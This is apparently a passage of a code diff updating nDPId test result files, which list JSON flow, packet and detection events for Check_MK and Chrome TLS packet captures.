00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1512031663734,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1512031663734,"pkt":"8soKyPpERjIA9qTsCABFAAA8AABAAEAG8SLAqGQywKhkFhmc5nZuqQJN1XLoOKAScSBJyAAAAgQFtAQCCAoWUVydKwxrPwEDAwc="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1512031663734,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1512031663734,"pkt":"RjIA9qTs8soKyPpECABFEAA0gwlAAEAGbhHAqGQWwKhkMuZ2GZzVcug4bqkCToAQAOVJwAAAAQEICisMaz8WUVyd"}
00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1512031663734,"flow_last_seen":1512031663736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1512031663736,"l3_proto":"ip4","src_ip":"192.168.100.22","dst_ip":"192.168.100.50","src_port":58998,"dst_port":6556,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"CHECKMK","breed":"Acceptable","category":"DataTransfer"}}
00700{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":98,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":98,"flow_first_seen":1512031663734,"flow_last_seen":1512031663775,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4096,"flow_tot_l4_payload_len":13758,"flow_avg_l4_payload_len":140,"midstream":0,"thread_ts_msec":1512031663775,"l3_proto":"ip4","src_ip":"192.168.100.22","dst_ip":"192.168.100.50","src_port":58998,"dst_port":6556,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"CHECKMK","breed":"Acceptable","category":"DataTransfer"}}
00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":98,"source":"check_mk_new.pcap","alias":"nDPId-test","packets-captured":98,"packets-processed":98,"total-skipped-flows":0,"total-l4-data-len":13758,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1512031663775}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 98/98

84
test/results/chrome.pcap.out
View File

@@ -1,47 +1,47 @@
00457{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"chrome.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"chrome.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1620902507870}
00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620902507870,"flow_last_seen":1620902507870,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620902507870,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64393,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1620902507870,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620902507870,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EvuJAbsdWbUDAAAAALAC\/\/8TEgAAAgQFtAEDAwUBAQgKM3SSOAAAAAAEAgAA"}
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1620902507899,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620902507899,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7+4lEvFS6HVm1BKAS\/og8HwAAAgQFrAQCCAo6mxVSM3SSOAEDAwc="}
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1620902507899,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620902507899,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EvuJAbsdWbUERLxUu4AQECxZJAAAAQEICjN0klQ6mxVS"}
00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902507870,"flow_last_seen":1620902507899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1620902507899,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64393,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902507870,"flow_last_seen":1620902507935,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1620902507935,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64393,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620902508740,"flow_last_seen":1620902508740,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620902508740,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64394,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1620902508740,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620902508740,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EvuKAbtgbcSnAAAAALAC\/\/+8\/wAAAgQFtAEDAwUBAQgKM3SVkQAAAAAEAgAA"}
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1620902508769,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620902508769,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7+4peZebaYG3EqKAS\/og23AAAAgQFrAQCCAo6mxi5M3SVkQEDAwc="}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1620902508769,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620902508769,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EvuKAbtgbcSoXmXm24AQECxT5gAAAQEICjN0lag6mxi5"}
00896{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902508740,"flow_last_seen":1620902508769,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":635,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1620902508769,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64394,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00935{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":49,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902508740,"flow_last_seen":1620902508800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":895,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1620902508800,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64394,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620902509272,"flow_last_seen":1620902509272,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620902509272,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64408,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1620902509272,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620902509272,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EvuYAbvjd2YSAAAAALAC\/\/+WlQAAAgQFtAEDAwUBAQgKM3SXeAAAAAAEAgAA"}
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":75,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620902509273,"flow_last_seen":1620902509273,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620902509273,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64409,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1620902509273,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620902509273,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EvuZAbt3hYKuAAAAALAC\/\/\/l6gAAAgQFtAEDAwUBAQgKM3SXeAAAAAAEAgAA"}
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620902509274,"flow_last_seen":1620902509274,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620902509274,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64410,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1620902509274,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620902509274,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EvuaAbt39JnFAAAAALAC\/\/\/OYgAAAgQFtAEDAwUBAQgKM3SXeQAAAAAEAgAA"}
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620902509276,"flow_last_seen":1620902509276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620902509276,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64411,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1620902509276,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620902509276,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EvubAbvm4fjEAAAAALAC\/\/8AcwAAAgQFtAEDAwUBAQgKM3SXewAAAAAEAgAA"}
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1620902509302,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620902509302,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7+5l1X2J5d4WCr6AS\/ojLGgAAAgQFrAQCCAo6mxrNM3SXeAEDAwc="}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1620902509302,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620902509302,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EvuZAbt3hYKvdV9ieoAQECzoIAAAAQEICjN0l5M6mxrN"}
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1620902509302,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620902509302,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7+5gJQMJ043dmE6AS\/oiH6wAAAgQFrAQCCAo6mxrLM3SXeAEDAwc="}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1620902509302,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620902509302,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EvuYAbvjd2YTCUDCdYAQECyk8QAAAQEICjN0l5M6mxrL"}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1620902509302,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620902509302,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7+5p\/iAsOd\/SZxqAS\/ogA1gAAAgQFrAQCCAo6mxrMM3SXeQEDAwc="}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":110,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1620902509302,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620902509302,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EvuaAbt39JnGf4gLD4AQECwd3QAAAQEICjN0l5M6mxrM"}
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":112,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1620902509303,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620902509303,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7+5sh1fPg5uH4xaAS\/oinwwAAAgQFrAQCCAo6mxrPM3SXewEDAwc="}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1620902509303,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620902509303,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EvubAbvm4fjFIdXz4YAQECzEywAAAQEICjN0l5Q6mxrP"}
00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902509273,"flow_last_seen":1620902509303,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":635,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1620902509303,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64409,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":115,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902509272,"flow_last_seen":1620902509303,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":635,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1620902509303,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64408,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":116,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902509274,"flow_last_seen":1620902509304,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1620902509304,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64410,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":117,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902509276,"flow_last_seen":1620902509304,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1620902509304,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64411,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":128,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902509273,"flow_last_seen":1620902509333,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":895,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1620902509333,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64409,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":132,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902509272,"flow_last_seen":1620902509335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":895,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1620902509335,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64408,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
